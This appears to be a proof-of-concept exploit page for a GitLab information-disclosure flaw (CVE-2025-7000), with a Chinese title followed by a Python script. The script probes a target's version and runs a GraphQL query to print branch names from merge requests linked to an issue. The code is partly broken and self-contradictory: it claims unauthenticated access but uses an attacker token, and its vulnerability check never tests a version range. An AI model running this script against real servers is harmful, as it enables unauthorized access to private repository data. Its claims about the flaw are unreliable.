CVE-2025-7000 GitLab CE/EE 机密分支名称信息泄露漏洞

import requests # CVE-2025-7000 PoC - GitLab Information Disclosure # Description: Unauthenticated users can view confidential branch names via project issues GITLAB_URL = "https://gitlab.example.com" PROJECT_ID = "<target_project_id>" ISSUE_IID = "<target_issue_iid>" USERNAME = "<attacker_username>" TOKEN = "<attacker_token>" def check_gitlab_version(): """Check if target GitLab version is vulnerable""" response = requests.get(f"{GITLAB_URL}/api/v4/version") if response.status_code == 200: version = response.json().get('version', '') # Check if version is in vulnerable range print(f"[*] GitLab Version: {version}") return True return False def get_issue_with_mr(): """Get issue details and extract branch names from related merge requests""" headers = { 'PRIVATE-TOKEN': TOKEN, 'Content-Type': 'application/json' } # GraphQL query to fetch issue with related MRs graphql_query = { "query": f""" {{ project(fullPath: "{PROJECT_ID}") {{ issue(iid: "{ISSUE_IID}") {{ title description mergeRequests {{ nodes {{ title sourceBranch targetBranch webUrl }} }} }} }} }} """ } response = requests.post( f"{GITLAB_URL}/api/graphql", json=graphql_query, headers=headers ) if response.status_code == 200: data = response.json() if 'data' in data and 'project' in data['data']: issue = data['data']['project']['issue'] if issue and 'mergeRequests' in issue: for mr in issue['mergeRequests']['nodes']: print(f"[!] Disclosed Branch Name: {mr['sourceBranch']}") print(f"[*] MR Title: {mr['title']}") print(f"[*] MR URL: {mr['webUrl']}") return True print("[-] No confidential branch information disclosed or access denied") return False if __name__ == "__main__": print("[*] CVE-2025-7000 PoC - GitLab Confidential Branch Name Disclosure") print("[*] Target: " + GITLAB_URL) if check_gitlab_version(): print("[*] Attempting to extract confidential branch names...") get_issue_with_mr() else: print("[-] Failed to verify GitLab version")